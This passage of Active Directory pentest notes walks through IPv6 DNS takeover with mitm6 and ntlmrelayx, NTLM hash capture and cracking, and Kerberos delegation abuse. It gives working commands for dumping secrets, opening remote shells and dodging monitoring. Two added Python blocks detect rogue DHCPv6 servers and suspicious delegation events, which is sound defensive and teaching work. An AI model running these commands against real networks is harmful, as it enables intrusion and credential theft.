- set mitm6 to listen for IPv6 (DHCPv6) requests on the network; it will answer and spoof them:
sudo python ~/tools/mitm6/mitm6/mitm6.py -d marvel.local
- for example, if we restart any machine we will see that the spoofing has taken effect; on the machine side (screenshot not reproduced here) the attacker's IPv6 address shows up as the machine's DNS server
- set up ntlmrelayx so that, after the spoofing, the captured authentication is relayed to the target:
sudo ntlmrelayx.py -6 -t ldaps://192.168.17.138 -wh evil.marvel.local -l loots
-6: listen on IPv6
-t: the target to relay to (here the DC)
-wh: WPAD host, i.e. the fake WPAD server you want to serve
-l: directory in which to save the loot
- in this example we are targeting the domain controller
- wait until a machine reboots or any other IPv6 activity happens on the network
- on the ntlmrelayx side (screenshot not reproduced here):
- it dumped a lot of information: users, groups, etc.
- remember that we put the SQL service entry in the description field earlier; we can see it here now
- now if an administrator logs in to the machine we just spoofed, mitm6 will authenticate to the DC over LDAP and create a new user for us with a special ACL
you can also capture hashes once you have spoofed the DNS server: when any user tries to access a share, the request comes back to you, allowing you to capture that user's hash ==(same idea as Responder, but instead of LLMNR it uses IPv6)==
# Set your spoofer
sudo python3 mitm6.py -d marvel.local
# Set your smbserver
smbserver.py -smb2support SMB .
Then you can try to crack it with:
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
- use the option --no-ra (do not advertise ourselves, i.e. send no router advertisements) to avoid blue team monitoring:
sudo python ~/tools/mitm6/mitm6/mitm6.py -d marvel.local --no-ra
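From the defender's side, the part of this attack that is hard to hide is the DHCPv6 Advertise/Reply that hands the victim a DNS server and search domain (with --no-ra the router advertisements disappear, but the DHCPv6 answers do not). The following detection sketch is an added example, not code from the page, from mitm6 or from any sensor product: it parses a DHCPv6 message (RFC 8415 TLV options; option 23 DNS servers, option 24 domain search list) and flags offered DNS servers that are not on an allowlist. The packets and addresses are constructed in the block (fe80::1337 as the made-up rogue address, 2001:db8::53 as the made-up legitimate server); only the search domain marvel.local comes from the page.

```python
import ipaddress
import struct

# DHCPv6 constants (RFC 8415 message types, RFC 3646 DNS options)
MSG_SOLICIT, MSG_ADVERTISE, MSG_REPLY = 1, 2, 7
OPTION_DNS_SERVERS = 23   # payload: concatenated 16-byte IPv6 addresses
OPTION_DOMAIN_LIST = 24   # payload: DNS label-encoded search domains


def build_option(code, data):
    """TLV option: 2-byte code, 2-byte length, payload (network byte order)."""
    return struct.pack("!HH", code, len(data)) + data


def encode_domain(name):
    """Encode a domain name as DNS labels, as OPTION_DOMAIN_LIST expects."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii")
                   for label in name.strip(".").split("."))
    return out + b"\x00"


def build_dhcpv6(msg_type, xid, dns_servers, search_domains):
    """Build a minimal DHCPv6 message; used here only to construct test input."""
    msg = bytes([msg_type]) + xid.to_bytes(3, "big")
    msg += build_option(OPTION_DNS_SERVERS,
                        b"".join(ipaddress.IPv6Address(a).packed for a in dns_servers))
    msg += build_option(OPTION_DOMAIN_LIST,
                        b"".join(encode_domain(d) for d in search_domains))
    return msg


def parse_dhcpv6(packet):
    """Return (msg_type, transaction_id, {option_code: [payload, ...]})."""
    if len(packet) < 4:
        raise ValueError("DHCPv6 message too short")
    msg_type = packet[0]
    xid = int.from_bytes(packet[1:4], "big")
    options, pos = {}, 4
    while pos < len(packet):
        if pos + 4 > len(packet):
            raise ValueError("truncated option header")
        code, length = struct.unpack("!HH", packet[pos:pos + 4])
        data = packet[pos + 4:pos + 4 + length]
        if len(data) != length:
            raise ValueError("truncated option payload")
        options.setdefault(code, []).append(data)
        pos += 4 + length
    return msg_type, xid, options


def decode_domains(data):
    """Decode the label-encoded names in an OPTION_DOMAIN_LIST payload."""
    names, pos = [], 0
    while pos < len(data):
        labels = []
        while True:
            n = data[pos]
            pos += 1
            if n == 0:
                break
            if pos + n > len(data):
                raise ValueError("truncated domain label")
            labels.append(data[pos:pos + n].decode("ascii"))
            pos += n
        names.append(".".join(labels))
    return names


def dns_servers_from(options):
    """All IPv6 addresses carried in OPTION_DNS_SERVERS, as strings."""
    servers = []
    for data in options.get(OPTION_DNS_SERVERS, []):
        for i in range(0, len(data) // 16 * 16, 16):
            servers.append(str(ipaddress.IPv6Address(data[i:i + 16])))
    return servers


def rogue_dns_servers(packet, allowed_dns):
    """DNS servers offered by a server-side DHCPv6 message (Advertise/Reply)
    that are not on the allowlist. On a network with no legitimate DHCPv6
    service the allowlist is empty, so every offered server is rogue."""
    msg_type, _xid, options = parse_dhcpv6(packet)
    if msg_type not in (MSG_ADVERTISE, MSG_REPLY):
        return []
    return [s for s in dns_servers_from(options) if s not in allowed_dns]


# Constructed fixtures (made up for this example; 2001:db8::/32 is documentation space).
ROGUE_ADVERTISE = build_dhcpv6(MSG_ADVERTISE, 0xABCDEF, ["fe80::1337"], ["marvel.local"])
LEGIT_REPLY = build_dhcpv6(MSG_REPLY, 0x123456, ["2001:db8::53"], ["marvel.local"])
ALLOWED_DNS = {"2001:db8::53"}

if __name__ == "__main__":
    for name, pkt in (("rogue", ROGUE_ADVERTISE), ("legit", LEGIT_REPLY)):
        print(name, rogue_dns_servers(pkt, ALLOWED_DNS))
```

In practice the packet bytes would come from a capture or a sensor on UDP port 547 (server side) rather than from the fixture builder; the check to keep is the one in rogue_dns_servers, and on an IPv4-only network the allowlist should simply be empty so that any DHCPv6 server answer at all raises an alert.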
- Kerberos delegation attack:
sudo ntlmrelayx.py -ts -6 -t ldaps://<dc-ip> -wh evil.marvel.local --add-computer --delegate-access
# the LDAP server is usually the domain controller itself
-ts: add a timestamp to every logging output
--add-computer: attempt to add a new computer account
--delegate-access: delegate access on the relayed computer account to the specified account
Once a computer restarts and we have spoofed DHCPv6 successfully, a new computer account with a random name is added and, per the options we specified, it is allowed to impersonate users on the relayed machine:
getST.py -spn cifs/<spoofed-computer>.lab.local lab.local/<new-computer>\$ -impersonate <domain-username>
# ex : getST.py -spn cifs/ws02.lab.local lab.local/ULRRDUA\$ -impersonate lkys
export KRB5CCNAME=lkys.ccache
we can now access the file system or get an interactive shell using this ticket:
psexec.py -k ws02.lab.local -debug -no-pass
secretsdump.py -k ws02.lab.local -no-pass
wmiexec.py -k -no-pass -debug ws02.lab.local
smbclient -k //ws02.lab.local/c$
https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
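On the domain controller this delegation flow leaves a distinctive trace: the relayed machine account (e.g. WS02$) creates a new computer object, and a moment later the same machine account writes msDS-AllowedToActOnBehalfOfOtherIdentity (the resource-based constrained delegation attribute that --delegate-access sets) on its own object. The correlation below is an added example, not code from the page, from impacket or from any SIEM: it runs over constructed Security-log records using the Windows event IDs 4741 (computer account created) and 5136 (directory object modified), with the field names flattened to a simplified JSON shape that is an assumption of this example. The names WS02, ULRRDUA$ and lab.local are reused from the page's own example; svc_join, LAPTOP17$ and WEB01 are made up.

```python
import json
from datetime import datetime, timedelta

# Attribute written by --delegate-access on the relayed computer object
# (resource-based constrained delegation).
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
EVENT_COMPUTER_CREATED = 4741   # "A computer account was created"
EVENT_OBJECT_MODIFIED = 5136    # "A directory service object was modified"

# Constructed sample records (one JSON object per line), not real telemetry;
# the field names are a flattened subset of the real 4741/5136 event data.
SAMPLE_LOG = """\
{"time": "2023-05-01T09:00:00", "id": 4741, "subject": "svc_join", "target": "LAPTOP17$"}
{"time": "2023-05-01T10:00:05", "id": 4741, "subject": "WS02$", "target": "ULRRDUA$"}
{"time": "2023-05-01T10:00:07", "id": 5136, "subject": "WS02$", "object": "CN=WS02,CN=Computers,DC=lab,DC=local", "attribute": "msDS-AllowedToActOnBehalfOfOtherIdentity", "operation": "Value Added"}
{"time": "2023-05-01T11:30:00", "id": 5136, "subject": "Administrator", "object": "CN=WEB01,CN=Computers,DC=lab,DC=local", "attribute": "servicePrincipalName", "operation": "Value Added"}
"""


def parse_events(text):
    """Parse JSON-lines records into dicts sorted by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        rec["time"] = datetime.fromisoformat(rec["time"])
        events.append(rec)
    return sorted(events, key=lambda e: e["time"])


def is_machine_account(name):
    """Machine (computer) accounts in AD end with '$'."""
    return name.endswith("$")


def cn_of(dn):
    """First RDN value of a DN, e.g. 'WS02' from 'CN=WS02,CN=Computers,...'."""
    rdn = dn.split(",", 1)[0]
    return rdn.split("=", 1)[1] if "=" in rdn else rdn


def find_delegation_abuse(events, window=timedelta(minutes=15)):
    """Alert when a machine account creates a computer object (4741) and, within
    the window, writes the RBCD attribute on its *own* computer object (5136).
    Both steps are performed by the relayed account, so the subjects match."""
    alerts = []
    rbcd_writes = [e for e in events
                   if e["id"] == EVENT_OBJECT_MODIFIED and e.get("attribute") == RBCD_ATTR]
    for c in events:
        if c["id"] != EVENT_COMPUTER_CREATED or not is_machine_account(c["subject"]):
            continue
        creator = c["subject"].rstrip("$").upper()
        for w in rbcd_writes:
            same_actor = w["subject"].upper() == c["subject"].upper()
            own_object = cn_of(w["object"]).upper() == creator
            in_window = c["time"] <= w["time"] <= c["time"] + window
            if same_actor and own_object and in_window:
                alerts.append({
                    "relayed_account": c["subject"],
                    "new_computer": c["target"],
                    "rbcd_target": w["object"],
                    "when": w["time"].isoformat(),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_delegation_abuse(parse_events(SAMPLE_LOG)):
        print(alert)
```

Event 5136 only appears if a SACL auditing "Write all properties" (or the specific attribute) exists on computer objects and Directory Service Changes auditing is enabled; without that, the 4741 with a machine-account subject is still worth a lower-severity alert on its own, since computer accounts normally create no other computer accounts. The same correlation also covers the --add-computer step in the LDAPS relay described earlier on this page.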